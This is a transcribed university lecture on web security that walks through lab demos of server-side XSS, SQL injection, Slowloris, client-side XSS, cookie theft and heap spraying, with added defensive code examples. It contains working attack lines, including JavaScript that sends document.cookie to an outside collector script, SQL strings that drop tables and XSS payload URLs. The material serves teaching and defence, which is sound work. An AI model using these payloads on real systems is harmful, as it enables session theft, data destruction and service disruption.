Network Security Lecture 08: Web Security 2024 PDF
Document Details
Alexandria University
2024
Sahar M. Ghanem
Summary
This document is a lecture on web security, covering prerequisites, languages, resources, common attacks like XSS, and security measures. It's presented by Sahar M. Ghanem at Alexandria University in 2024.
Full Transcript
Network Security Lecture 08: Web Security
Prof. Dr. Sahar M. Ghanem, Associate Professor, Computer & Systems Engineering Dept., Faculty of Engineering, Alexandria University

Prerequisites
- URL, HTTP and HTML
- Apache2 web server installed on an Ubuntu machine
- The Apache2 server is PHP7 enabled
- MySQL database management system acting as the database backend to the Apache2 server
- A driver is installed that enables PHP to talk to MySQL
- The sendmail program running on the server
Network Security 2024, (c) Sahar M. Ghanem

Languages
- PHP
- Perl
- MySQL
- Python
- JavaScript
- CGI scripts

Resources
- PHP vs NodeJS: Comparison and benchmarks 2018
- PHP: PHP Manual – Manual
- PHP Tutorial
- MySQL :: MySQL Documentation
- (The only proper) PDO tutorial - Treating PHP Delusions
- Modsecurity Project
- JavaScript Tutorial
- OWASP Foundation, the Open Source Foundation for Application Security

Outline
- XSS attack with server-side injection
- SQL Injection Attack
- The Slowloris Attack
- mod-security
- client-side XSS
- Cookies & XSS for stealing cookies
- The Heap Spray Exploit

Web Security
Web security addresses the issues that are specific to how web servers present their content to web browsers, how web browsers interact with the servers, and how people interact with the browsers.

The World Wide Web
Until about a decade ago, web servers offered only static content; now web servers create content dynamically. Dynamic content creation frequently requires that a web server be connected to a database server that stores all the information to be served dynamically. This requires some sort of middleware that can analyze the URL, decide what to fetch, and then compose a web page to be sent back.
The “middleware” frequently consists of PHP scripts, especially if the web server platform is the open-source Apache with MySQL as the database.

XSS attack with server-side injection

XSS attack with server-side injection (1/5)
A cross-site scripting (XSS) attack with server-side injection of malicious code. We have a supposedly unscrupulous provider of web hosting services. He wants to inject some PHP code into the web pages uploaded to his server by unsuspecting clients. By design, PHP is parsed out before a page is sent to a browser (controlled by a set of directives in the apache2.conf config file). The injected PHP code will NOT be visible to a client even when the client views the page source in his/her browser.

XSS attack with server-side injection (2/5)
The basic goal is to cause a spam file to be quietly downloaded from a third-party spam mail provider whenever a client page is viewed. The spam file consists of the email addresses and the content for each email address, in the form of print() commands to an output stream that talks to the sendmail program running on the server.

XSS attack with server-side injection (3/5)
Web Hosting Service Provider:
- IP address: 192.168.1.105
- OS: Ubuntu 10.04
- Web Server: Apache2 HTTPD server
- MTA: Sendmail
- Also available: Perl
Innocent Client:
- IP address: 192.168.1.103
- OS: Mac OS X
- Web Browser: Safari 3.2.1
Email List Provider: https://engineering.purdue.edu/kak/emailer_pl

XSS attack with server-side injection (4/5)
The web hosting service provider makes available an upload page, called UploadYourWebPage.html, to his clients. The HTML calls on uploadfile.php for the “Submit” action on the form.
uploadfile.php creates another file that is identical to what the client uploaded except for the extra PHP code.

emailer.pl

mail.log file

XSS attack with server-side injection (5/5)
Note that even when an email is successfully placed on the wire, it may NOT arrive at its destination, for various reasons:
- organizations block email coming from IP address blocks assigned to residential units
- the presence of the localhost.localdomain string in the email header

Kak’s code (Lecture 27)
- engineering.purdue.edu/kak/emailer_pl
- UploadYourWebPage.html
- uploadfile.php

SQL Injection Attack

PHP + MySQL
A PHP-enabled web server works in conjunction with the MySQL database management system. For PHP and MySQL to work together on your Ubuntu machine, you must also have installed the “php7.0-mysql” package. This package allows a PHP script to make a direct connection with a MySQL database through a PDO (PHP Data Objects) based driver.

MySQL
Assume a MySQL database with row-level security serving as a backend to the Apache web server. Create a MySQL database named Manager_db for the user Manager. Create one table named Maintenance_Schedule. Install in MySQL three accounts under the user names Operator1, Operator2, and Operator3. When any of these three individuals accesses the Maintenance_Schedule table, he/she will be able to view only his/her own row and no other rows.

SQL Injection Attack1 (1/2)
Create an HTML page RetrieveFromMySQL.html with a form element that asks the visitor to enter his MySQL user name and password. The file on the server side that will be executed when the visitor hits the “Submit” button on the form is called RetrieveFromMySQL.php. When the visitor clicks the “Submit” button of the form, his/her browser sends the following URL back to the server:
http://192.168.1.105/~kak/phpAndSqlExploits/RetrieveFromMySQL.php?user=Operator1&password=operator1

RetrieveFromMySQL.html

SQL Injection Attack1 (2/2)
This URL is sent in clear text, so it would not be difficult for an adversary to hit the server with different possible values in order to test for certain kinds of vulnerabilities. For this SQL injection, a major enabler of the exploit was the use of the GET method for form submission: all of the form fields become part of the URL that is sent back to the web server, and the URL can easily be altered by hand.

SQL Injection Attack2
Consider a user who has certain access privileges at a database and is provided with a GUI for making data entries, e.g.
insert into Maintenance_Schedule values ('Engine parts', '2009-06-30');
When this user instead enters a string like
nothing; DROP TABLE *;
such a user input could end up deleting all the tables in the database. The main reason why an SQL injection exploit works is the fact that the SQL syntax places the commands and the data on an equal footing.

Security against SQL Injection
Unless the user input is carefully filtered and the command access privileges given to the user carefully controlled, a user input could end up deleting all the tables in the database.
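An added example, not from the lecture or Kak’s code: the Maintenance_Schedule insert from the slide built two ways in Python, with sqlite3 standing in for MySQL. The (item, due_date) columns and a GUI that pastes the user’s whole VALUES text into the statement are assumptions, since the slides give neither the schema nor the PHP.

```python
# Added example, not from the lecture or Kak's code. sqlite3 stands in for
# MySQL; the (item, due_date) columns and the GUI passing the whole VALUES
# text through are assumptions, since the slides give neither schema nor PHP.
import sqlite3

# What the slide's honest user types, and the slide's "nothing; DROP TABLE"
# idea written so that it parses (constructed for this example).
HONEST_VALUES = "'Engine parts', '2009-06-30'"
HOSTILE_VALUES = "'nothing', '2009-06-30'); DROP TABLE Maintenance_Schedule; --"


def fresh_db():
    """In-memory stand-in for Manager_db with the Maintenance_Schedule table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Maintenance_Schedule (item TEXT, due_date TEXT)")
    return con


def insert_unsafe(con, values_text):
    """Commands and data on an equal footing: the user's text is pasted into
    the statement, so quotes and semicolons in it become SQL syntax.
    executescript() runs every statement in the string, as a driver that
    permits stacked queries would. Returns the SQL that was run."""
    sql = f"INSERT INTO Maintenance_Schedule VALUES ({values_text});"
    con.executescript(sql)
    return sql


def insert_safe(con, item, due_date):
    """Parameter binding (what a PDO prepared statement gives you in PHP):
    the SQL text is fixed and the values travel separately, so whatever the
    user typed is stored as data and never parsed as a command."""
    con.execute("INSERT INTO Maintenance_Schedule VALUES (?, ?)", (item, due_date))


def table_exists(con):
    row = con.execute("SELECT name FROM sqlite_master WHERE type = 'table' "
                      "AND name = 'Maintenance_Schedule'").fetchone()
    return row is not None


def items(con):
    return [r[0] for r in con.execute("SELECT item FROM Maintenance_Schedule")]
```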
A PDO (PHP Data Objects) based database driver provides a uniform API for communicating with different database systems and considerable security against SQL injection exploits.

Kak’s code (Lecture 27)
- RetrieveFromMySQL.html
- RetrieveFromMySQL.php

The Slowloris Attack

The Slowloris Attack
Described by Robert Hansen in 2009. It consists of a client sending only partially completed requests to a web server, the requests being long enough to create TCP circuits that the server keeps open in the expectation that the partial requests will be completed soon. If the server does not have sufficient concurrency available to it, a Slowloris attack can potentially bring down a web server.

The Slowloris Attack: Example1
HTTP requests emanating from a client could come from a browser, a download script, or a system utility like wget. ClientSocketFetchDocs.py is a Python client script that makes a legitimate GET request to a web server. The web server keeps the TCP connection open until it times out (observed with netstat, this takes about 65 seconds). Run CheckNetstat.sh on the server side to watch the connections.

The Slowloris Attack: Example2
The TestHTTPServerWithNoCRLF.py script on the client side sends the same server GET requests but without the final blank line. If you run the script so that it sends only once, it puts the client to sleep for 200 seconds in order to find out how long the server takes to shut the TCP circuit. The server requires a longer timeout to close the TCP connection with the client.

The Slowloris Attack: Example3
Create a semblance of a Slowloris attack on the server by invoking the previous script repeatedly, as shown in RepeatedAttack.sh. Start the script CheckNetstat.sh on the server side.
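An added example of the server-side defence, not from the lecture or Kak’s scripts: a request-head reader that closes any connection whose headers have not ended with the blank line by a deadline measured from the first byte (the idea Apache’s mod_reqtimeout module implements). The socketpair-based client and the two request strings are constructed for this example.

```python
# Added example, not from the lecture or Kak's scripts: a request-head reader
# with an absolute deadline, the idea Apache's mod_reqtimeout implements.
import socket
import threading
import time


def read_request_head(conn, deadline_seconds):
    """Return the request head (everything before the blank line), or close the
    connection and return None if the blank line has not arrived by the
    deadline. The deadline counts from the first call, not from the last byte,
    so trickling one header line at a time cannot extend it like an idle timeout."""
    deadline = time.monotonic() + deadline_seconds
    buf = b""
    while b"\r\n\r\n" not in buf:
        remaining = deadline - time.monotonic()
        chunk = b""
        if remaining > 0 and len(buf) <= 8192:  # 8192: assumed head size cap
            conn.settimeout(remaining)
            try:
                chunk = conn.recv(1024)  # raises socket.timeout at the deadline
            except socket.timeout:
                pass
        if not chunk:  # deadline passed, head too big, or peer went away
            conn.close()  # free the worker slot the stalled request was holding
            return None
        buf += chunk
    return buf.split(b"\r\n\r\n", 1)[0].decode("latin-1")


def simulate(client_bytes, line_delay, deadline_seconds):
    """Drive read_request_head with an in-process client (socketpair) that sends
    client_bytes one line at a time, then holds the connection open like Slowloris."""
    server_side, client_side = socket.socketpair()
    server_gave_up = threading.Event()

    def client():
        try:
            for line in client_bytes.splitlines(keepends=True):
                client_side.sendall(line)
                time.sleep(line_delay)
        except OSError:  # server already closed its end
            pass
        server_gave_up.wait()
        client_side.close()

    threading.Thread(target=client, daemon=True).start()
    head = read_request_head(server_side, deadline_seconds)
    server_gave_up.set()
    server_side.close()  # no-op if read_request_head already closed it
    return head


# Constructed requests: complete, and the same without the final blank line
# (what TestHTTPServerWithNoCRLF.py sends).
COMPLETE = b"GET /index.html HTTP/1.1\r\nHost: www.example.test\r\n\r\n"
NO_BLANK_LINE = b"GET /index.html HTTP/1.1\r\nHost: www.example.test\r\n"
```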
Even though Kak’s scripts have not completely jammed the server, they do demonstrate how a client can silently bog it down and degrade its performance for legitimate requests. The script TerminateLoris.sh kills all the processes created by the script RepeatedAttack.sh.

SlowPost Attack
Another HTTP request method that can also be used for mounting similar attacks on web servers is the POST request (the SlowPOST attack).

Kak’s code (Lecture 27) (Wayback Machine)
- ClientSocketFetchDocs.py
- CheckNetstat.sh
- TestHTTPServerWithNoCRLF.py
- RepeatedAttack.sh
- TerminateLoris.sh

mod-security

mod-security (1/2)
For Apache, the access log entries are in the file /var/log/apache2/access.log. If you freshly install a web server on a machine, you will soon see scanners looking to see whether port 80 is open with an HTTPD server running, and then trying to attack that web server with all known exploits. The HTTP requests sent by such scanners do not mention the symbolic hostname of the machine on which the web server is running, but directly its IP address.

mod-security (2/2)
One way to insulate a web server from port-scan driven attacks is to not honor requests that do not mention the symbolic hostname of the machine. For an Apache web server, the easiest way to make it more secure is to install the mod-security module in the server. Its Core Rule Set should protect the web server against exploits commonly attempted on web servers.

client-side XSS

client-side XSS (1/2)
The idea of a client-side XSS attack is to get a victim to click on a URL that causes the browser’s JavaScript engine to execute malicious code.
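An added example, not from the lecture or Kak’s code, of the echo that the demo page’s PHP performs, first verbatim and then HTML-encoded, together with a model of why an HttpOnly cookie does not show up in document.cookie (the value read on the cookie-stealing slides later). The page markup, the cookie names and the test URL (the slide’s alert() payload wrapped in script tags and percent-encoded) are constructed.

```python
# Added example, not from the lecture or Kak's code. The markup, cookie names
# and test URL are constructed; the URL is the slide's alert() payload wrapped
# in script tags and percent-encoded.
import html
from urllib.parse import parse_qs, urlsplit

PAGE = ("<html><body><h1>Client Side XSS -- Simple Demo</h1>"
        "<p>You asked for: {query}</p></body></html>")
DEMO_URL = ("http://10.0.0.13/~kak/xss_client_side_simple_demo.html/"
            "?query=%3Cscript%3Ealert(%27Do%20you%20agree%3F%27)%3B%3C%2Fscript%3E")


def query_from_url(url):
    """The query field as the server-side PHP receives it (URL-decoded)."""
    return parse_qs(urlsplit(url).query).get("query", [""])[0]


def render_unsafe(query):
    """Echo the value verbatim, as the demo page's PHP does: any markup in it
    is parsed by the browser, so a <script> element in it runs."""
    return PAGE.format(query=query)


def render_safe(query):
    """HTML-encode <, >, &, " and ' so the value is displayed as text."""
    return PAGE.format(query=html.escape(query, quote=True))


def contains_script_element(page):
    return "<script" in page.lower()


def session_cookie(name, value, http_only=True):
    """Set-Cookie header value; HttpOnly tells the browser to keep the cookie
    out of document.cookie, which is what the cookie-stealing steps read."""
    attrs = [f"{name}={value}", "Path=/", "SameSite=Lax"]
    if http_only:
        attrs.append("HttpOnly")
    return "; ".join(attrs)


def document_cookie(set_cookie_values):
    """Model of what document.cookie returns for the given Set-Cookie values:
    browsers omit every cookie that carries the HttpOnly attribute."""
    visible = []
    for value in set_cookie_values:
        parts = [p.strip() for p in value.split(";")]
        if not any(p.lower() == "httponly" for p in parts[1:]):
            visible.append(parts[0])
    return "; ".join(visible)
```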
The attacker knows that the victim will click on the URL http://10.0.0.13/~kak/xss_client_side_simple_demo.html. This HTML contains a call to PHP to echo back to the browser whatever the web server receives as the value of the query field.

xss_client_side_simple_demo.html (rendered page: “Client Side XSS -- Simple Demo”)

client-side XSS (2/2)
The attacker may now get the victim to click on the following URL, which carries a query field that will be received by the web server:
http://10.0.0.13/~kak/xss_client_side_simple_demo.html/?query=alert('Do you agree?');
The victim will see a JavaScript-produced prompt window that waits for a response with an “OK?” button, i.e. the browser executed a fragment of JavaScript.

Cookies

Cookies (1/2)
It may be possible for third parties to steal cookies from an innocent client’s browser by mounting an XSS attack. JavaScript is meant specifically for browser-side computing and is an object-based language. Cookies are generally used to retain some data from one session to another between a client browser and a web server.

Cookies (2/2)
You can see all the cookies in the browser under “Edit” --> “Preferences”. If you need to control who gets to place cookies in your browser and which websites are allowed HTTP redirects: the cookie controller that comes with the browser is a cookie blacklister; under “Tools” --> “Add-ons” you can install Cookie Whitelist with Buttons, and NoRedirect.

WealthTracker.html
If you run a web server and point the browser to http://10.0.0.11/~kak/WealthTracker.html you will see a form in your browser with two text-entry boxes, one for your name and the other for your wealth, and with a “Submit” button.
This page keeps track of how many times you have visited the page in the past and how your wealth has changed from one visit to the next. This form is not supposed to send anything back to the server.

Kak’s Code (Lecture 28)
- WealthTracker.html

XSS for stealing cookies

XSS for stealing cookies (1/3)
The name of that earlier file was WealthTracker.html. It is converted into a CGI script named WealthTracker.cgi.
STEP 1: Fire up the Apache web server on a laptop that has the CGI script WealthTracker.cgi in its cgi-bin directory.
STEP 2: Point the browser to the URL http://10.0.0.11/cgi-bin/WealthTracker.cgi

XSS for stealing cookies (2/3)
STEP 3: Bring up the JavaScript console in the browser and, in the input bar at the bottom of the console, enter the following two JavaScript commands:
var cookie_info = document.cookie
window.open("https://engineering.purdue.edu/kak/cgi-bin/Collector.cgi?msg=" + cookie_info)
The web server in the engineering.purdue.edu domain hosts Collector.cgi, which dumps whatever is supplied through the parameter msg into a dump file collections.txt.

XSS for stealing cookies (3/3)
STEP 4: Display the contents of the file collections.txt, which has acquired the cookie that was created by the browser.

Kak’s Code (Lecture 28)
- WealthTracker.cgi
- Index of /kak/cgi-bin

The Heap Spray Exploit

Heap Spray Exploit
Used for the execution of arbitrary shellcode through a client-side scripting language like JavaScript.
1. Heap spraying: fill up a significant chunk of the memory available to the script engine with no-op bytes (referred to as a nop-sled).
2. Place the malicious shell-executable code at the end of the long sequence of no-op bytes.
3. Get the script engine to dereference any one of the memory locations where the no-op bytes are stored.
4. The dereferencing operation causes the script engine to start executing the code at that location and at the subsequent locations that also contain no-op bytes; finally, the execution arrives at the malicious code.

Heap Spray References
- Heap Feng Shui in JavaScript
- darkc0dews - Pastebin.com
- Blogs - Broadcom Community - VMTN - Discussion Forums, Technical Docs, Ideas and Blogs

Web Vulnerabilities

Browser Vulnerabilities
The Samy worm, in 2005, used browser-to-server communication to fetch documents. The JavaScript code is based on code by Alejandro Gervasio, JavaScript-Remote-Scripting-Fetching-Server-Data-with-the-DOM. Run the Apache server and point the browser to a URL that would look like http://10.185.42.199/~kak/js_getdata_from_server.html. Another mode of XSS attack involves the HTML tag which allows a web page to incorporate the contents of another web page. Code at http://www.bindshell.net/papers/xssv.html

Web Application Security
The “Open Web Application Security Project” (OWASP) is focused on improving the security of web application software. W3af is a tool for exhaustive testing of a web application for all kinds of vulnerabilities. Its user guide is the file named w3af-users-guide.pdf. It comes with 130 plugins meant for identifying SQL injection vulnerabilities, cross-site scripting vulnerabilities, vulnerabilities created by remote file inclusion, …

Reference
https://fahrplan.events.ccc.de/congress/2006/Fahrplan/attachments/1158-Subverting_Ajax.pdf